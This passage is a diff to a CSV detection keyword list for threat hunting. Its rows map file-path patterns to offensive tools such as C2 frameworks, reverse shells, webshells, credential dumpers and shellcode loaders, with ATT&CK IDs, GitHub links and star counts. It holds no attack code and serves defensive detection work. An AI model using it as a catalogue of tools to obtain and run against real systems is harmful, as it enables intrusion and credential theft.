allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" -"*/SharpDPAPI.git*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*/SharpDump*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/SharpDPAPI.git*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*/SharpDump*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*/SharpExfiltrate.git*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*/SharpExfiltrate/*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*/SharpGmailC2.git*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*/SharpHandler.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/SharpHandler.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/SharpHide.git*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*/SharpLDAP.git*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*/SharpNoPSExec*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" -"*/SharpRDP.git*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*/SharpRDP.git*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*/SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" -"*/SharpShares/Enums*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*/SharpShellPipe.git*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*/SharpShares/Enums*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*/SharpShellPipe.git*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" "*/SharpSocks*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" -"*/SharpSploit*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/SharpSploit*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/SharpSploit/*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*/SharpSpoolTrigger*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*/SharpSpray.exe*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" @@ -5207,11 +5263,11 @@ "*/SharpView.git*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*/SharpWSUS*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*/SharPyShell*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" -"*/shell/password.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/shell/password.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/shell/shell_port.*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" -"*/shell_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/shell_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/Shell3er/*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" -"*/shellcode*loader.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/shellcode*loader.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/shellcode.bin*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*/shellcode.bin.*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/shellcode.hex*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" @@ -5219,14 +5275,14 @@ "*/shellcode_excel*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/ShellCode_Loader*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*/shellcode_samples/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*/shellcode_sources/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/shellcode_sources/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/ShellcodeFluctuation*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" -"*/Shellcode-Hide.git*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/Shellcode-Hide.git*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/SHELLCODELOADER*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*/Shellcode-Loader.git*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","139","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" +"*/Shellcode-Loader.git*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" "*/shellcodes/utils.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/shellcodetester*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" -"*/ShellGhost.git*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*/ShellGhost.git*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" "*/shellinject*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/ShellPop*","offensive_tool_keyword","ShellPop","Shellpop is all about popping shells. With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.","T1059 - T1574 - T1055 - T1021","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/0x00-0x00/ShellPop","1","0","N/A","N/A","10","1393","237","2019-04-02T14:53:19Z","2018-03-08T03:58:00Z" "*/Shells/shell.aspx*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" @@ -5236,34 +5292,34 @@ "*/Shells/shell.sh*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" "*/Shells/tomcat.war*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" "*/Shells/wordpress.zip*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation 